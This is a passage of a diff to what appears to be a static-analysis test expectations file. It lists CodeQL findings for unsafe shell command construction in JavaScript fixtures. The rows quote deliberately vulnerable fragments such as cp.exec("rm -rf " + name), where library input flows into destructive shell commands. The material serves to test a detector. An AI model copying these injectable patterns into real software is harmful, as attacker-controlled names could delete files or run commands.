")) | shell command | +| lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | lib/lib.js:82:35:82:38 | name | lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:98:35:98:38 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:98:35:98:38 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:98:2:98:40 | cp.exec ... name)) | shell command | +| lib/lib.js:100:37:100:40 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:100:37:100:40 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:100:2:100:42 | cp.exec ... 
name)) | shell command | +| lib/lib.js:102:46:102:49 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:102:46:102:49 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:102:2:102:51 | cp.exec ... name)) | shell command | +| lib/lib.js:108:41:108:44 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:108:41:108:44 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:108:2:108:46 | cp.exec ... name)) | shell command | +| lib/lib.js:112:10:112:25 | "rm -rf " + name | lib/lib.js:111:34:111:37 | name | lib/lib.js:112:22:112:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:111:34:111:37 | name | library input | lib/lib.js:112:2:112:26 | cp.exec ... + name) | shell command | +| lib/lib.js:121:10:121:25 | "rm -rf " + name | lib/lib.js:120:33:120:36 | name | lib/lib.js:121:22:121:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:120:33:120:36 | name | library input | lib/lib.js:121:2:121:26 | cp.exec ... + name) | shell command | +| lib/lib.js:131:11:131:26 | "rm -rf " + name | lib/lib.js:130:6:130:9 | name | lib/lib.js:131:23:131:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:130:6:130:9 | name | library input | lib/lib.js:131:3:131:27 | cp.exec ... + name) | shell command | +| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command | +| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command | +| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command | +| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | +| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | +| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command | +| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command | +| lib/lib.js:197:10:197:25 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:197:22:197:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:197:2:197:26 | cp.exec ... 
+ name) | shell command | +| lib/lib.js:200:11:200:26 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:200:23:200:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:200:3:200:27 | cp.exec ... + name) | shell command | +| lib/lib.js:207:10:207:25 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:207:22:207:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:207:2:207:26 | cp.exec ... + name) | shell command | +| lib/lib.js:212:11:212:26 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:212:23:212:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:212:3:212:27 | cp.exec ... + name) | shell command | +| lib/lib.js:217:10:217:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:217:22:217:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:217:2:217:26 | cp.exec ... + name) | shell command | +| lib/lib.js:220:11:220:26 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:220:23:220:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:220:3:220:27 | cp.exec ... + name) | shell command | +| lib/lib.js:224:10:224:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:224:22:224:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:224:2:224:26 | cp.exec ... 
+ name) | shell command | +| lib/lib.js:228:10:228:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:228:22:228:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:228:2:228:26 | cp.exec ... + name) | shell command | +| lib/lib.js:236:10:236:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:236:22:236:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:236:2:236:26 | cp.exec ... + name) | shell command | +| lib/lib.js:249:10:249:25 | "rm -rf " + name | lib/lib.js:248:42:248:45 | name | lib/lib.js:249:22:249:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:249:2:249:26 | cp.exec ... + name) | shell command | +| lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | lib/lib.js:248:42:248:45 | name | lib/lib.js:253:22:253:28 | cleaned | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:253:2:253:29 | cp.exec ... leaned) | shell command | +| lib/lib.js:258:10:258:25 | "rm -rf " + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:258:22:258:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:258:2:258:26 | cp.exec ... + name) | shell command | +| lib/lib.js:261:11:261:33 | "rm -rf ... + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:261:30:261:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:261:3:261:34 | cp.exec ... + name) | shell command | +| lib/lib.js:268:10:268:32 | "rm -rf ... 
version | lib/lib.js:267:46:267:48 | obj | lib/lib.js:268:22:268:32 | obj.version | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:267:46:267:48 | obj | library input | lib/lib.js:268:2:268:33 | cp.exec ... ersion) | shell command | +| lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:277:23:277:30 | opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | shell command | +| lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:281:23:281:35 | this.opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | shell command | +| lib/lib.js:308:11:308:26 | "rm -rf " + name | lib/lib.js:307:39:307:42 | name | lib/lib.js:308:23:308:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:307:39:307:42 | name | library input | lib/lib.js:308:3:308:27 | cp.exec ... + name) | shell command | +| lib/lib.js:315:10:315:25 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:315:22:315:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:315:2:315:26 | cp.exec ... + name) | shell command | +| lib/lib.js:320:11:320:26 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:320:23:320:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:320:3:320:27 | cp.exec ... + name) | shell command | +| lib/lib.js:325:12:325:51 | "MyWind ... " + arg | lib/lib.js:324:40:324:42 | arg | lib/lib.js:325:49:325:51 | arg | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:324:40:324:42 | arg | library input | lib/lib.js:326:2:326:13 | cp.exec(cmd) | shell command | +| lib/lib.js:340:10:340:26 | "rm -rf " + id(n) | lib/lib.js:339:39:339:39 | n | lib/lib.js:340:22:340:26 | id(n) | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:339:39:339:39 | n | library input | lib/lib.js:340:2:340:27 | cp.exec ... id(n)) | shell command | +| lib/lib.js:351:10:351:27 | "rm -rf " + unsafe | lib/lib.js:349:29:349:34 | unsafe | lib/lib.js:351:22:351:27 | unsafe | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:349:29:349:34 | unsafe | library input | lib/lib.js:351:2:351:28 | cp.exec ... unsafe) | shell command | +| lib/lib.js:406:10:406:25 | "rm -rf " + name | lib/lib.js:405:39:405:42 | name | lib/lib.js:406:22:406:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:405:39:405:42 | name | library input | lib/lib.js:406:2:406:26 | cp.exec ... + name) | shell command | +| lib/lib.js:415:10:415:25 | "rm -rf " + name | lib/lib.js:414:40:414:43 | name | lib/lib.js:415:22:415:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:415:2:415:26 | cp.exec ... + name) | shell command | +| lib/lib.js:417:28:417:31 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:417:28:417:31 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:417:2:417:66 | cp.exec ... => {}) | shell command | +| lib/lib.js:418:25:418:28 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:418:25:418:28 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:418:2:418:45 | cp.spaw ... 
true}) | shell command | +| lib/lib.js:419:32:419:35 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:419:32:419:35 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:419:2:419:52 | cp.exec ... true}) | shell command | +| lib/lib.js:420:29:420:32 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:420:29:420:32 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:420:2:420:49 | cp.spaw ... true}) | shell command | +| lib/lib.js:424:24:424:27 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:424:24:424:27 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:426:11:426:14 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:426:11:426:14 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:427:14:427:16 | arr | lib/lib.js:414:40:414:43 | name | lib/lib.js:427:14:427:16 | arr | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:428:14:428:58 | build(" ... + '-') | lib/lib.js:414:40:414:43 | name | lib/lib.js:428:14:428:58 | build(" ... + '-') | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:436:19:436:22 | last | lib/lib.js:414:40:414:43 | name | lib/lib.js:436:19:436:22 | last | This shell argument which depends on $@ is later used in a $@. 
| lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:442:12:442:27 | "rm -rf " + name | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:441:39:441:42 | name | library input | lib/lib.js:442:2:442:28 | asyncEx ... + name) | shell command | +| lib/lib.js:447:13:447:28 | "rm -rf " + name | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:446:20:446:23 | name | library input | lib/lib.js:447:3:447:29 | asyncEx ... + name) | shell command | +| lib/lib.js:478:27:478:46 | config.installedPath | lib/lib.js:477:39:477:44 | config | lib/lib.js:478:27:478:46 | config.installedPath | This path concatenation which depends on $@ is later used in a $@. | lib/lib.js:477:39:477:44 | config | library input | lib/lib.js:479:12:479:20 | exec(cmd) | shell command | +| lib/lib.js:483:13:483:33 | ' my na ... + name | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:482:40:482:43 | name | library input | lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | shell command | +| lib/lib.js:499:19:499:34 | "rm -rf " + name | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:498:45:498:48 | name | library input | lib/lib.js:499:3:499:35 | MyThing ... + name) | shell command | +| lib/lib.js:510:10:510:25 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:510:22:510:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:510:2:510:26 | cp.exec ... 
+ name) | shell command | +| lib/lib.js:513:11:513:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:513:23:513:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:513:3:513:27 | cp.exec ... + name) | shell command | +| lib/lib.js:519:11:519:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:519:23:519:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:519:3:519:27 | cp.exec ... + name) | shell command | +| lib/lib.js:525:11:525:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:525:23:525:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:525:3:525:27 | cp.exec ... + name) | shell command | +| lib/lib.js:531:11:531:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:531:23:531:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:531:3:531:27 | cp.exec ... + name) | shell command | +| lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | +| lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... 
+ name) | shell command | +| lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | +| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:560:14:560:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:560:26:560:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:560:9:560:30 | exec("r ... + name) | shell command | +| lib/lib.js:562:14:562:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:562:26:562:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:562:9:562:30 | exec("r ... + name) | shell command | +| lib/lib.js:566:14:566:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:566:26:566:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:566:9:566:30 | exec("r ... + name) | shell command | +| lib/lib.js:573:10:573:25 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:573:22:573:25 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:573:2:573:26 | cp.exec ... + name) | shell command | +| lib/lib.js:579:13:579:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:579:25:579:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:579:5:579:29 | cp.exec ... + name) | shell command | +| lib/lib.js:590:17:590:32 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:590:29:590:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:590:9:590:33 | cp.exec ... + name) | shell command | +| lib/lib.js:593:13:593:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:593:25:593:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:593:5:593:29 | cp.exec ... + name) | shell command | +| lib/lib.js:609:10:609:25 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:609:22:609:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:609:2:609:26 | cp.exec ... + name) | shell command | +| lib/lib.js:626:17:626:32 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:626:29:626:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:626:9:626:33 | cp.exec ... + name) | shell command | +| lib/lib.js:629:13:629:28 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:629:25:629:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:629:5:629:29 | cp.exec ... + name) | shell command | +| lib/lib.js:633:18:633:68 | "'" + n ... 
) + "'" | lib/lib.js:632:38:632:41 | name | lib/lib.js:633:24:633:62 | name.re ... '\\\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | +| lib/lib.js:634:10:634:30 | "rm -rf ... nitized | lib/lib.js:632:38:632:41 | name | lib/lib.js:634:22:634:30 | sanitized | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | +| lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | shell command | +| lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | lib/subLib4/index.js:6:32:6:35 | name | lib/subLib4/subsub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib4/index.js:6:32:6:35 | name | library input | lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... 
+ name) | shell command | +| lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | lib/subLib/amdSub.js:3:28:3:31 | name | lib/subLib/amdSub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/amdSub.js:3:28:3:31 | name | library input | lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | lib/subLib/index.js:3:28:3:31 | name | lib/subLib/index.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:3:28:3:31 | name | library input | lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | lib/subLib/index.js:7:32:7:35 | name | lib/subLib/index.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:7:32:7:35 | name | library input | lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:14:22:14:24 | arr | lib/subLib/index.js:13:44:13:46 | arr | lib/subLib/index.js:14:22:14:24 | arr | This shell argument which depends on $@ is later used in a $@. | lib/subLib/index.js:13:44:13:46 | arr | library input | lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | shell command | edges | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | provenance | | | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | provenance | | | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | provenance | | -| lib/lib.js:3:28:3:31 | name | lib/lib.js:4:22:4:25 | name | provenance | | +| lib/lib.js:3:33:3:36 | name | lib/lib.js:4:22:4:25 | name | provenance | | | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | provenance | | | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | provenance | | | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | provenance | | 
@@ -100,7 +207,7 @@ edges | lib/lib.js:436:19:436:22 | last | lib/lib.js:436:10:436:12 | [post update] arr [ArrayElement] | provenance | | | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | provenance | | | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | provenance | | -| lib/lib.js:477:33:477:38 | config | lib/lib.js:478:27:478:32 | config | provenance | | +| lib/lib.js:477:39:477:44 | config | lib/lib.js:478:27:478:32 | config | provenance | | | lib/lib.js:478:27:478:32 | config | lib/lib.js:478:27:478:46 | config.installedPath | provenance | | | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | provenance | | | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | provenance | | @@ -149,7 +256,7 @@ nodes | lib/lib2.js:4:22:4:25 | name | semmle.label | name | | lib/lib2.js:7:32:7:35 | name | semmle.label | name | | lib/lib2.js:8:22:8:25 | name | semmle.label | name | -| lib/lib.js:3:28:3:31 | name | semmle.label | name | +| lib/lib.js:3:33:3:36 | name | semmle.label | name | | lib/lib.js:4:22:4:25 | name | semmle.label | name | | lib/lib.js:10:32:10:35 | name | semmle.label | name | | lib/lib.js:11:22:11:25 | name | semmle.label | name | @@ -285,7 +392,7 @@ nodes | lib/lib.js:442:24:442:27 | name | semmle.label | name | | lib/lib.js:446:20:446:23 | name | semmle.label | name | | lib/lib.js:447:25:447:28 | name | semmle.label | name | -| lib/lib.js:477:33:477:38 | config | semmle.label | config | +| lib/lib.js:477:39:477:44 | config | semmle.label | config | | lib/lib.js:478:27:478:32 | config | semmle.label | config | | lib/lib.js:478:27:478:46 | config.installedPath | semmle.label | config.installedPath | | lib/lib.js:482:40:482:43 | name | semmle.label | name | 
@@ -348,110 +455,3 @@ subpaths | lib/lib.js:251:27:251:30 | name | lib/lib.js:239:28:239:28 | s | lib/lib.js:245:9:245:9 | s | lib/lib.js:251:16:251:31 | cleanInput(name) | | lib/lib.js:340:25:340:25 | n | lib/lib.js:329:13:329:13 | x | lib/lib.js:330:9:330:9 | x | lib/lib.js:340:22:340:26 | id(n) | | lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | lib/lib.js:431:23:431:26 | last | lib/lib.js:437:9:437:11 | arr [ArrayElement] | lib/lib.js:428:14:428:58 | build(" ... + '-') | -#select -| lib/isImported.js:6:10:6:25 | "rm -rf " + name | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/isImported.js:5:49:5:52 | name | library input | lib/isImported.js:6:2:6:26 | cp.exec ... + name) | shell command | -| lib/lib2.js:4:10:4:25 | "rm -rf " + name | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:3:28:3:31 | name | library input | lib/lib2.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/lib2.js:8:10:8:25 | "rm -rf " + name | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:7:32:7:35 | name | library input | lib/lib2.js:8:2:8:26 | cp.exec ... + name) | shell command | -| lib/lib.js:4:10:4:25 | "rm -rf " + name | lib/lib.js:3:28:3:31 | name | lib/lib.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:3:28:3:31 | name | library input | lib/lib.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/lib.js:11:10:11:25 | "rm -rf " + name | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:10:32:10:35 | name | library input | lib/lib.js:11:2:11:26 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:15:10:15:25 | "rm -rf " + name | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:14:36:14:39 | name | library input | lib/lib.js:15:2:15:26 | cp.exec ... + name) | shell command | -| lib/lib.js:20:10:20:25 | "rm -rf " + name | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:19:34:19:37 | name | library input | lib/lib.js:20:2:20:26 | cp.exec ... + name) | shell command | -| lib/lib.js:27:10:27:25 | "rm -rf " + name | lib/lib.js:26:35:26:38 | name | lib/lib.js:27:22:27:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:26:35:26:38 | name | library input | lib/lib.js:27:2:27:26 | cp.exec ... + name) | shell command | -| lib/lib.js:35:11:35:26 | "rm -rf " + name | lib/lib.js:34:14:34:17 | name | lib/lib.js:35:23:35:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:34:14:34:17 | name | library input | lib/lib.js:35:3:35:27 | 